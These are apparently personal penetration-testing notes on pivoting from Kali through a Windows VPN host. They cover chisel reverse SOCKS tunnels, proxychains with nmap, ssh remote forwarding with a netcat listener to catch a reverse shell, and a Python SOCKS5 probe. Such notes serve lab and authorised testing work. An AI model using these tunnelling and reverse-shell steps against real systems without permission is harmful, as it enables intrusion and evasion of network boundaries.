
Pivot in a Case


Last updated 2 years ago

Scenario: you have a VPN to the target machine, but it only runs on the Windows machine, and you want to attack from Kali Linux.

  1. Fire up the Windows machine and establish the VPN connection; make sure you can access the target machine.

  2. Set up a Host-Only connection between the Windows machine and the Kali machine; make sure you can communicate with the Kali machine.

  3. Upload chisel.exe to the Windows machine, and install chisel on Kali.

  4. Set up the chisel server on the Kali machine.

chisel server -p 9090 --reverse

  5. Then connect to the chisel server from the Windows machine.

.\chisel.exe client <ip kali machine>:9090 R:socks

  6. Set /etc/proxychains.conf to use the socks5 proxy.

[ProxyList]
socks5 127.0.0.1 <socks port>

  7. Test the connection. Important: traffic through this connection leaves with the Windows machine's IP as the source IP in the packet, so you can't ping, because the Kali machine can't receive the ICMP packet. If you run nmap, always use -Pn to skip the ping used for host discovery.

proxychains nmap -Pn <target machine behind the windows machine>
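
Why only TCP checks work in step 7, as an added example that is not part of the original notes: a SOCKS5 proxy relays TCP connections requested with a CONNECT message (RFC 1928) and cannot carry ICMP. The Python sketch below performs that handshake by hand against the local SOCKS listener and returns the proxy's reply for one target port. The function names and command-line arguments are assumptions made for this example.

```python
import socket
import struct

# SOCKS5 reply codes from RFC 1928, section 6.
REPLIES = {
    0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def build_connect_request(host, port):
    """CONNECT request: VER=5, CMD=1 (CONNECT), RSV=0, then address and port."""
    try:
        addr = b"\x01" + socket.inet_aton(host)       # ATYP 1: IPv4 literal
    except OSError:
        name = host.encode("idna")
        addr = b"\x03" + bytes([len(name)]) + name    # ATYP 3: domain name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)


def _recv_exact(sock, n):
    """Read exactly n bytes or fail if the proxy hangs up early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_probe(proxy_host, proxy_port, host, port, timeout=10.0):
    """Return the proxy's reply text for a TCP CONNECT to host:port."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(b"\x05\x01\x00")                    # greeting: one method, no auth
        if _recv_exact(s, 2) != b"\x05\x00":
            raise ConnectionError("proxy did not accept no-auth SOCKS5")
        s.sendall(build_connect_request(host, port))
        _ver, rep, _rsv, _atyp = _recv_exact(s, 4)    # reply header; REP is byte 2
        return REPLIES.get(rep, "unknown reply %d" % rep)


if __name__ == "__main__":
    import sys
    # Assumed usage: probe.py <socks port> <target> <tcp port>
    print(socks5_probe("127.0.0.1", int(sys.argv[1]), sys.argv[2], int(sys.argv[3])))
```

A "succeeded" reply means the Windows side of the tunnel completed the TCP connection to the target; any other reply tells you whether the failure is at the proxy or at the target port.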

How to set up a reverse shell?

You need another forward proxy from the Windows machine to the Kali machine.

There are 2 options, depending on the middle machine. Linux machine with SSH:

ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>

Your reverse shell:

host: <middle machine IP>
port: 443

Netcat listener for the shell:

nc -lvnp 8080

How about setting up Burp Suite?

Requirements:

  1. Tunnel connection with socks5 127.0.0.1 9666 --> use chisel as above

  2. Set your browser proxy to the Burp proxy

  3. Just let it go :D

ref:

https://www.youtube.com/watch?v=mOuqPROMmZc
https://www.youtube.com/watch?v=Q5ujOEXGOo8